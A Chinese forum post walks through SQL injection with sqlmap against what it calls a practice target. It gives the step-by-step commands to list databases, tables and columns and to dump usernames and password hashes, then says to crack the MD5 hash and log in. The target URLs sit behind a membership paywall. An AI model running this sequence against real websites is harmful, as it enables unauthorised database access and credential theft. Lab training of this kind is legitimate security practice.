设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
实战利用sqlmap渗透
返回列表
发帖
查看:
268
|
回复:
0
[其他技术]
实战利用sqlmap渗透
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 17:52:59
|
显示全部楼层
|
阅读模式
使用工具:sqlmap
直接sqlmap -u
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
检测注入点之后
sqlmap -u sqlmap -u sqlmap -u
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
--dbs
查找数据库发现mozhe_discuz_stormgroup数据库即为我们需要的sqlmap -u
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
-D mozhe_discuz_stormgroup --tables
猜测表名查找到stormgroup_member的表,想必用户信息就在其中sqlmap -u
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
-D mozhe_discuz_stormgroup -T stormgroup_member --columns
查找字段列名可以很清楚地看到存在name以及password的字段列故sqlmap -u
本帖隐藏的内容需要
【资源会员】
才可浏览,您需要升级才可浏览,
点击这里升级【资源会员】
-D mozhe_discuz_stormgroup -T stormgroup_member -C name,password --dump
查看字段随机看到name为mozhepassword为一串MD5加密代码,解密后即为密码使用name和password登录即可
最后说一句这个是找的靶机,别傻乎乎去瞎找网站扫描
sqlmap
,
stormgroup
,
tingjigonggao
,
219.153
,
49.228
相关帖子
•
sqlmap-gtk ,sqlmap图形化界面工具安装
•
[NB]手机端的sql注入
•
【原创教程】手机安装kali和sqlmap
•
【技术教程】??记一次sqlmap超详细注入教学??
•
【FUT】sqlmap注入功能详解
•
【FUT】手机如何用termux安装sqlmap
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表